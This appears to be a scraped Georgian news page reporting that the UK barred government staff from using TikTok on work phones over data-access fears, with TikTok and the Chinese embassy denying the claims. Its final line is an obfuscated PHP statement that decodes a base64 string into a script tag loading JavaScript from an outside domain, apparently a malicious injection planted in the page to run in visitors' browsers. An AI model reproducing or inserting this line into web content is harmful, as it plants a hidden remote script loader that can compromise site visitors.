celsiusi
ავერსი საქკაბელი
ბრიტანეთის მთავრობის წარმომადგენლებს სამსახურებრივ ტელეფონებში ჩინური სოციალური ქსელის, „ტიკტოკის“ გამოყენება აეკრძალათ. ინფორმაციას „ბიბისი“ ავრცელებს.
შეზღუდვის მიზეზად უსაფრთხოება დასახელდა. ბრიტანეთში შიშობენ, რომ ჩინეთის მთავრობამ, შესაძლოა, ოფიციალურ ტელეფონებში დაცულ მონაცემებზე შეძლოს ამ გზით წვდომა.
„ტიკტოკი“ კატეგორიულად უარყოფს ბრალდებებს, რომ ის მომხმარებლების მონაცემებს ჩინეთის მთავრობას გადასცემს. ბრიტანეთში ჩინეთის საელჩოში აცხადებენ, რომ ეს ნაბიჯი პოლიტიკურადააა მოტივირებული და არ არის დაფუძნებული კონკრეტულ ფაქტებსა და მტკიცებულებზე. 
281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");